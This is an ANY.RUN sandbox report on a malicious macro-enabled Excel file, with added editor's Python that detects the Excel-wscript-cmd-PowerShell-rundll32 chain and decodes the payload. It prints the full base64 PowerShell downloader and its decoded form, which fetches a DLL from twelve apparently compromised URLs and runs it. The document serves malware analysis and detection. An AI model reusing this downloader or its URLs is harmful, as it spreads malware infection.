File name:

2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75

Full analysis: https://app.any.run/tasks/4b437809-d1de-4095-9a7e-10cf4cf842bb
Verdict: Malicious activity
Analysis date: December 13, 2024, 21:51:14
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Author: User, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:17:20 2015, Last Saved Time/Date: Wed Feb 2 17:50:11 2022, Security: 0
MD5:

DF83087B44EB6C636A2FA2FB43978D54

SHA1:

1D2256B397986D01071369ADBE3ADEB4BD89CE5E

SHA256:

2A689047A4D1BFAB15AC22741C4B7B073E61FB85212BD124BE0062B833F88B75

SSDEEP:

6144:VOY28G6cm86MpnN/BH6oOoawaPlTVLADrRiJnzDEY3WHZ1GOIo/oJnS:7wViJPN3yZ1GONoJnS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from MS Office

      • EXCEL.EXE (PID: 3612)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • wscript.exe (PID: 2996)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 1572)
    • Executing commands from a ".bat" file

      • wscript.exe (PID: 2996)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 1572)
    • The process executes VB scripts

      • EXCEL.EXE (PID: 3612)
    • Detected use of alternative data streams (AltDS)

      • EXCEL.EXE (PID: 3612)
    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 5540)
      • cmd.exe (PID: 6608)
      • cmd.exe (PID: 6980)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 396)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2996)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 1572)
    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 5540)
      • cmd.exe (PID: 6608)
      • cmd.exe (PID: 6980)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 396)
    • Base64-obfuscated command line is found

      • cmd.exe (PID: 5540)
      • cmd.exe (PID: 6608)
      • cmd.exe (PID: 6980)
      • cmd.exe (PID: 6244)
      • cmd.exe (PID: 396)
  • INFO

    • Reads mouse settings

      • EXCEL.EXE (PID: 3612)
    • Creates files in the program directory

      • EXCEL.EXE (PID: 3612)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • EXCEL.EXE (PID: 3612)
    • The process uses the downloaded file

      • wscript.exe (PID: 2996)
      • EXCEL.EXE (PID: 3612)
      • wscript.exe (PID: 6556)
      • wscript.exe (PID: 6928)
      • wscript.exe (PID: 6296)
      • wscript.exe (PID: 1572)
    • Reads Internet Explorer settings

      • powershell.exe (PID: 3040)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 2972)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 2972)
    • Remote server returned an error (POWERSHELL)

      • powershell.exe (PID: 3040)
    • Disables trace logs

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
    • Uses string split method (POWERSHELL)

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
      • powershell.exe (PID: 2972)
    • Checks proxy server information

      • powershell.exe (PID: 3040)
      • powershell.exe (PID: 6668)
      • powershell.exe (PID: 7040)
      • powershell.exe (PID: 4944)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

CompObjUserType: ???? Microsoft Office Excel 2003
CompObjUserTypeLen: 33
HeadingPairs:
  • Листы (Russian for "Sheets"; consistent with the Cyrillic code page 1251 reported above)
  • 1
TitleOfParts: Sheet1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 12
CodePage: Windows Cyrillic
Security: None
ModifyDate: 2022:02:02 17:50:11
CreateDate: 2015:06:05 18:17:20
Software: Microsoft Excel
LastModifiedBy: 1
Author: User
All screenshots are available in the full report
Total processes: 158
Monitored processes: 36
Malicious processes: 6
Suspicious processes: 0

Behavior graph

The same chain runs five times, once per wscript.exe instance (PIDs 2996, 6556, 6296, 6928, 1572). In the report's graph every process except excel.exe and the first chain's powershell.exe (PID 3040, the only one with its own indicators) is marked "no specs", i.e. it carries no process-level indicators of its own. Command lines are taken from the process table below.

excel.exe (3612)
  wscript.exe               wscript c:\programdata\wetidjks.vbs
    cmd.exe                 /c "C:\programdata\jledshf.bat"
      conhost.exe
      powershell.exe        powershell -enc <base64 downloader>
    cmd.exe                 /c start /B rundll32 ...
      conhost.exe
      rundll32.exe          c:\programdata\vbkwk.dll,dfsgeresd
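The graph above is the whole sample in one line: Excel runs a VBS staged in C:\ProgramData, the VBS runs a .bat, the .bat runs base64-encoded PowerShell to fetch a DLL, and a second cmd.exe launches that DLL through rundll32 with an export name. The checks below, as an added example (editor's code, not part of the ANY.RUN report), express that chain as lineage and command-line rules over process-creation events. The events are constructed from the command lines in the process table: the PIDs and command lines of the chain are the report's, while the explorer.exe and svchost.exe PIDs, parents and command lines are assumed, and the PowerShell argument is cut to the first 56 characters of the real blob since only the flag matters here.

```python
"""Lineage and command-line checks for the Excel -> wscript -> cmd -> powershell
-> rundll32 chain in the behavior graph. Added example, not part of the ANY.RUN
report. Input: process-creation events with pid, ppid, image and cmdline, the
fields any EDR or Sysmon Event ID 1 feed provides."""
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
LOLBINS = {"cmd.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe"} | SCRIPT_HOSTS
# Directories an unprivileged user can write to; every stage of this sample
# (wetidjks.vbs, jledshf.bat, vbkwk.dll) is staged in C:\ProgramData.
USER_WRITABLE = re.compile(r'^[a-z]:\\(?:programdata|users\\[^\\]+\\appdata|windows\\temp)\\', re.I)
SCRIPT_PATH = re.compile(r'([a-z]:\\[^"\s]+\.(?:vbs|vbe|js|jse|wsf))', re.I)
BATCH_PATH = re.compile(r'([a-z]:\\[^"\s]+\.(?:bat|cmd))', re.I)
RUNDLL_CALL = re.compile(r'rundll32(?:\.exe)?"?\s+"?([a-z]:\\[^",\s]+\.dll)"?\s*,\s*(\S+)', re.I)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed events modeled on the process table. PIDs and command lines of the
# chain are the report's; explorer.exe/svchost.exe PIDs, ppids and command lines
# are assumed, and the -enc blob is cut to its first 56 characters.
EVENTS = [
    {"pid": 1000, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 3612, "ppid": 1000, "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75.xls'},
    {"pid": 2996, "ppid": 3612, "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"wscript c:\programdata\wetidjks.vbs"},
    {"pid": 5540, "ppid": 2996, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'C:\WINDOWS\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "'},
    {"pid": 5032, "ppid": 5540, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1"},
    {"pid": 3040, "ppid": 5540, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIA"},
    {"pid": 6432, "ppid": 2996, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd'},
    {"pid": 6496, "ppid": 6432, "image": r"C:\Windows\SysWOW64\rundll32.exe",
     "cmdline": r"c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd"},
    {"pid": 3568, "ppid": 700, "image": r"C:\Windows\System32\svchost.exe", "cmdline": "svchost.exe -k netsvcs"},
    {"pid": 4712, "ppid": 3568, "image": r"C:\Windows\System32\MoUsoCoreWorker.exe", "cmdline": "MoUsoCoreWorker.exe"},
]


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def lineage(by_pid, pid):
    """Image names from the process up to the root, following ppid links."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return names


def has_encoded_command(cmdline):
    """True for -EncodedCommand and the prefixes PowerShell accepts (-e, -ec, -enc, ...)
    when the next token looks like base64; -ExecutionPolicy and -ep do not match."""
    tokens = cmdline.split()
    for flag, arg in zip(tokens, tokens[1:]):
        name = flag[1:].lower() if flag[:1] in "-/" else ""
        if name and (name == "ec" or "encodedcommand".startswith(name)) and B64_TOKEN.fullmatch(arg):
            return True
    return False


def detect(events):
    """Return sorted (rule, pid) pairs; conhost.exe and service noise never match."""
    by_pid = {e["pid"]: e for e in events}
    hits = set()
    for e in events:
        pid, cmd = e["pid"], e["cmdline"]
        names = lineage(by_pid, pid)
        image = names[0]
        parent = names[1] if len(names) > 1 else ""
        if image in SCRIPT_HOSTS and parent in OFFICE_APPS:
            hits.add(("office_spawns_script_host", pid))
        if image in LOLBINS and any(n in OFFICE_APPS for n in names[1:]):
            hits.add(("lolbin_descends_from_office", pid))
        m = SCRIPT_PATH.search(cmd)
        if image in SCRIPT_HOSTS and m and USER_WRITABLE.match(m.group(1)):
            hits.add(("script_in_user_writable_dir", pid))
        m = BATCH_PATH.search(cmd)
        if image == "cmd.exe" and m and USER_WRITABLE.match(m.group(1)):
            hits.add(("batch_in_user_writable_dir", pid))
        if image == "powershell.exe" and has_encoded_command(cmd):
            hits.add(("encoded_powershell", pid))
        m = RUNDLL_CALL.search(cmd)  # also fires on the cmd.exe that launches rundll32
        if m and USER_WRITABLE.match(m.group(1)):
            hits.add(("rundll32_dll_in_user_writable_dir", pid))
    return sorted(hits)


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{pid:>5}  {rule}")
```

The lineage walk is what makes the rules hold up when the intermediate cmd.exe is replaced by something else: a rundll32.exe or powershell.exe with an Office ancestor anywhere in its chain is flagged regardless of how many hops sit between them.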

Process information

Each entry lists PID, command line, image path and parent process, followed by the first loaded modules.
PID: 3612
CMD: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" C:\Users\admin\Desktop\2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75.xls
Path: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
16.0.16026.20146
Modules
Images
c:\program files\microsoft office\root\office16\excel.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ole32.dll
c:\windows\system32\ucrtbase.dll
c:\program files\common files\microsoft shared\clicktorun\appvisvsubsystems64.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\combase.dll
PID: 2996
CMD: wscript c:\programdata\wetidjks.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 5540
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
PID: 5032
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 3040
CMD: powershell -enc JABnAGoAcwBlAGIAbgBnAHUAawBpAHcAdQBnADMAawB3AGoAZAA9ACIAaAB0AHQAcAA6AC8ALwBhAGMAdABpAHYAaQBkAGEAZABlAHMALgBsAGEAZgBvAHIAZQB0AGwAYQBuAGcAdQBhAGcAZQBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBCAGwAawBkAE8ASwBEAFgATAAvACwAaAB0AHQAcAA6AC8ALwBzAGIAYwBvAHAAeQBsAGkAdgBlAC4AYwBvAG0ALgBiAHIALwByAGoAdQB6AC8AdwAvACwAaAB0AHQAcABzADoALwAvAHQAcgBhAHMAaQB4AC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB5ADUAQQBhADEAagB0ADAAUwBwADIAUQBrAC8ALABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBwAGEAcgBrAGkAbgBzAG8AbgBzAC4AYwBvAC4AaQBuAC8AYQBiAGMALwBZADYAWQAwAGYAVABiAFUARQBnADYALwAsAGgAdAB0AHAAcwA6AC8ALwBiAGkAegAuAG0AZQByAGwAaQBuAC4AdQBhAC8AdwBwAC0AYQBkAG0AaQBuAC8AVwA2AGEAZwB0AEYAUwBSAFoARwB0ADMANwAxAGQAVgAvACwAaAB0AHQAcAA6AC8ALwBiAHIAdQBjAGsAZQB2AG4ALgBzAGkAdABlAC8AMwB5AHoAdAB6AHoAdgBoAC8AbgBtAFkANAB3AFoAZgBiAFkATAAvACwAaAB0AHQAcABzADoALwAvAHAAYQByAGQAaQBzAGsAbwBvAGQALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBOAFIALwAsAGgAdAB0AHAAcwA6AC8ALwBkAGEAdQBqAGkAbQBhAGgAYQByAGEAagBtAGEAbgBkAGkAcgAuAG8AcgBnAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8ANgAzAEQAZQAvACwAaAB0AHQAcABzADoALwAvAGQAYQB0AGEAcwBpAHQAcwAuAGMAbwBtAC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AWgBrAGoANABRAE8ALwAsAGgAdAB0AHAAcwA6AC8ALwBhAG4AdQBnAGUAcgBhAGgAbQBhAHMAaQBuAHQAZQByAG4AYQBzAGkAbwBuAGEAbAAuAGMAbwAuAGkAZAAvAHcAcAAtAGEAZABtAGkAbgAvAFMASgBiAHgARQA1AEkALwAsAGgAdAB0AHAAcwA6AC8ALwBhAHQAbQBlAGQAaQBjAC4AYwBsAC8AcwBpAHMAdABlAG0AYQBzAC8AMwBaAGIAcwBVAEEAVQAvACwAaAB0AHQAcABzADoALwAvAGEAbgB3AGEAcgBhAGwAYgBhAHMAYQB0AGUAZQBuAC4AYwBvAG0ALwBGAG8AeAAtAEMANAAwADQALwBtAEQASABrAGYAZwBlAGIATQBSAHoAbQBHAEsAQgB5AC8AIgAuAHMAcABMAGkAVAAoACIALAAiACkAOwBmAE8AcgBlAGEAQwBoACgAJABoAGsAbAB3AFIASABKAFMAZQA0AGgAIABpAG4AIAAkAGcAagBzAGUAYgBuAGcAdQBrAGkAdwB1AGcAMwBrAHcAagBkACkAewAkAEoAcwAzAGgAbABzAGsAZABjAGYAawA9ACIAdgBiAGsAdwBrACIAOwAkAHMAZABlAHcASABTAHcAMwBnAGsAagBzAGQAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkAD0AIgBjADoAXABwAHIAbwBnAHIAYQBtAGQAYQB0AGEAXAAiACsAJABKAHMAMwBoAGwAcwBrAGQAYwBmAGsAKwAiAC4AZABsAGwAIgA7AGkATgB2AE8AawBlAC0AdwBFAGIAcgBlAFEAdQBlAHMAVAAgAC0AdQBSAGkAIAAkAGgAawBsAHcAUgBIAEoAUwBlADQAaAAgAC0AbwB1AFQAZgBpAEwAZQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAA7AGkAZgAoAHQAZQBzAHQALQBwAEEAdABIACAAJABJAEQAcgBmAGcAaABzAGIAegBrAGoAeABkACkAewBpAGYAKAAoAGcAZQB0AC0AaQBUAGUAbQAgACQASQBEAHIAZgBnAGgAcwBiAHoAawBqAHgAZAApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADUAMAAwADAAMAApAHsAYgByAGUAYQBrADsAfQB9AH0A
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6432
CMD: "C:\Windows\System32\cmd.exe" /c start /B c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 6440
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6496
CMD: c:\windows\syswow64\rundll32.exe c:\programdata\vbkwk.dll,dfsgeresd
Path: C:\Windows\SysWOW64\rundll32.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\aclayers.dll
PID: 6556
CMD: wscript c:\programdata\wetidjks.vbs
Path: C:\Windows\System32\wscript.exe
Parent process: EXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 6608
CMD: C:\WINDOWS\system32\cmd.exe /c ""C:\programdata\jledshf.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\cmdext.dll
c:\windows\system32\advapi32.dll
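The `-enc` argument in the PID 3040 entry is base64 over the UTF-16LE bytes of the script, which is why a plain ASCII decode of it shows a NUL after every character. The decoder below, as an added example (editor's code, not part of the ANY.RUN report), unpacks such an argument and pulls out the download URLs, the staged file path and the size check. SAMPLE_SCRIPT is the editor's decoding of the blob above, reproduced as the sample input: a loop over twelve URLs, all on compromised-looking WordPress paths (wp-admin, wp-content, wp-includes), that writes each response to c:\programdata\vbkwk.dll with Invoke-WebRequest and stops at the first file of at least 50000 bytes; the rundll32 command in the PID 6432/6496 entries then calls the export dfsgeresd from that DLL. The mixed-case cmdlet names (iNvOke-wEbreQuesT, spLiT) work because PowerShell is case-insensitive and exist only to defeat case-sensitive string matching. Re-run decode_enc on the blob from the process table to confirm the list; the HTTP rows below show only the trasix.com request (301, then 404) and the parkinsons.co.in request (301), and a 2.89 Kb 404 page fails the 50000-byte gate, so which download, if any, produced the DLL is not visible in this excerpt.

```python
"""Decode a PowerShell -enc/-EncodedCommand argument and pull the indicators out
of the downloader it hides. Added example, not part of the ANY.RUN report."""
import base64
import re

URL_RE = re.compile(r"""https?://[^\s"',;)]+""")
WIN_PATH_RE = re.compile(r"""[a-z]:\\[^"'\s;]+""", re.I)
# $v = "lit" + $other + "lit" ;  (one or more string/variable terms joined by +)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*((?:"[^"]*"|\$\w+)(?:\s*\+\s*(?:"[^"]*"|\$\w+))*)\s*;')
TERM_RE = re.compile(r'"([^"]*)"|\$(\w+)')

# Editor's decoding of the -enc blob in the PID 3040 entry, used as sample input;
# re-run decode_enc on that blob to confirm it.
SAMPLE_SCRIPT = (
    r'$gjsebngukiwug3kwjd="http://actividades.laforetlanguages.com/wp-admin/BlkdOKDXL/,'
    r'http://sbcopylive.com.br/rjuz/w/,https://trasix.com/wp-admin/y5Aa1jt0Sp2Qk/,'
    r'https://www.parkinsons.co.in/abc/Y6Y0fTbUEg6/,https://biz.merlin.ua/wp-admin/W6agtFSRZGt371dV/,'
    r'http://bruckevn.site/3yztzzvh/nmY4wZfbYL/,https://pardiskood.com/wp-content/NR/,'
    r'https://daujimaharajmandir.org/wp-includes/63De/,https://datasits.com/wp-includes/Zkj4QO/,'
    r'https://anugerahmasinternasional.co.id/wp-admin/SJbxE5I/,https://atmedic.cl/sistemas/3ZbsUAU/,'
    r'https://anwaralbasateen.com/Fox-C404/mDHkfgebMRzmGKBy/".spLiT(",");'
    r'fOreaCh($hklwRHJSe4h in $gjsebngukiwug3kwjd){$Js3hlskdcfk="vbkwk";$sdewHSw3gkjsd=Get-Random;'
    r'$IDrfghsbzkjxd="c:\programdata\"+$Js3hlskdcfk+".dll";'
    r'iNvOke-wEbreQuesT -uRi $hklwRHJSe4h -ouTfiLe $IDrfghsbzkjxd;'
    r'if(test-pAtH $IDrfghsbzkjxd){if((get-iTem $IDrfghsbzkjxd).Length -ge 50000){break;}}}'
)


def decode_enc(blob):
    """Script text behind -enc: base64 over the UTF-16LE bytes of the script.
    Padding is re-added so blobs copied without their trailing '=' still decode."""
    padded = blob + "=" * (-len(blob) % 4)
    return base64.b64decode(padded).decode("utf-16-le", errors="replace")


def encode_enc(script):
    """Inverse of decode_enc: how the .bat built the command line for powershell."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def string_assignments(script):
    """Fold $v = "lit" + $other + "lit" into literals, in script order, so a staged
    path assembled by concatenation comes out as one string."""
    values = {}
    for var, expr in ASSIGN_RE.findall(script):
        values[var] = "".join(values.get(ref, "$" + ref) if ref else lit
                              for lit, ref in TERM_RE.findall(expr))
    return values


def extract_iocs(script):
    """Download URLs, staged file paths and the minimum-size gate the loop applies."""
    values = string_assignments(script)
    gate = re.search(r"\.Length\s+-ge\s+(\d+)", script, re.I)
    return {
        "urls": URL_RE.findall(script),
        "paths": sorted(v for v in values.values() if WIN_PATH_RE.fullmatch(v)),
        "min_size": int(gate.group(1)) if gate else None,
    }


if __name__ == "__main__":
    blob = encode_enc(SAMPLE_SCRIPT)  # what jledshf.bat handed to powershell -enc
    for key, value in extract_iocs(decode_enc(blob)).items():
        print(key, value)
```

The size gate is worth keeping in the extracted indicators: it tells a responder that a DLL under 50000 bytes in C:\ProgramData was a failed download the loop skipped over, and that the one rundll32 ran is at least that large.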
Total events
38 856
Read events
38 600
Write events
235
Delete events
21

Modification events

(PID) Process: (3612) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation: write
Name: 1
Value: 01D014000000001000B24E9A3E02000000000000000600000000000000

(PID) Process: (3612) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\EXCEL\3612
Operation: write
Name: 0
Value: 0B0E10276106308273D040AFB4A4EE1C56D077230046D18C8FD892B5D3ED016A04102400449A7D64B29D01008500A907556E6B6E6F776EC906022222CA0DC2190000C91003783634C5119C1CD2120965007800630065006C002E00650078006500C51620C517808004C91808323231322D44656300

(PID) Process: (3612) EXCEL.EXE
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation: write (one write per name)
Name: en-US, de-de, fr-fr, es-es, it-it, ja-jp, ko-kr, pt-br
Value: 2
Executable files
1
Suspicious files
14
Text files
16
Unknown types
0

Dropped files

PID / Process / Type / Filename, followed by MD5 and SHA256

3612 EXCEL.EXE (binary) C:\Users\admin\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStoreV3\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S
MD5: 4B73B97A32FE50F651991C98CC376AF2
SHA256: 33AD294E59C5BE5C658254AF5A2F57A22B6597D7DEA8F384D2E7159340F53711
3612 EXCEL.EXE (xml) C:\Users\admin\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\AF376BB0-34F6-4A48-99DF-D5518996C2BC
MD5: 04A48B5F3A67F8492E5E1C5F7111CD84
SHA256: 1DA489E2A146769BAC50DC29F66D9409E7AB1B895F2FFC4864976BEDDC62B82E
3612 EXCEL.EXE (text) C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
MD5: D858D374AF60DF3220AB5DB3108D1834
SHA256: 08378DA7559BBB53B9ECCB1B91E1FDA2D42F9400F559D28B3284545093306D6D
3040 powershell.exe (text) C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_v1ptieop.nor.psm1
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3612 EXCEL.EXE (binary) C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\2a689047a4d1bfab15ac22741c4b7b073e61fb85212bd124be0062b833f88b75.xls.LNK
MD5: 90EC0B10217902AEB3A0BAD1E3376907
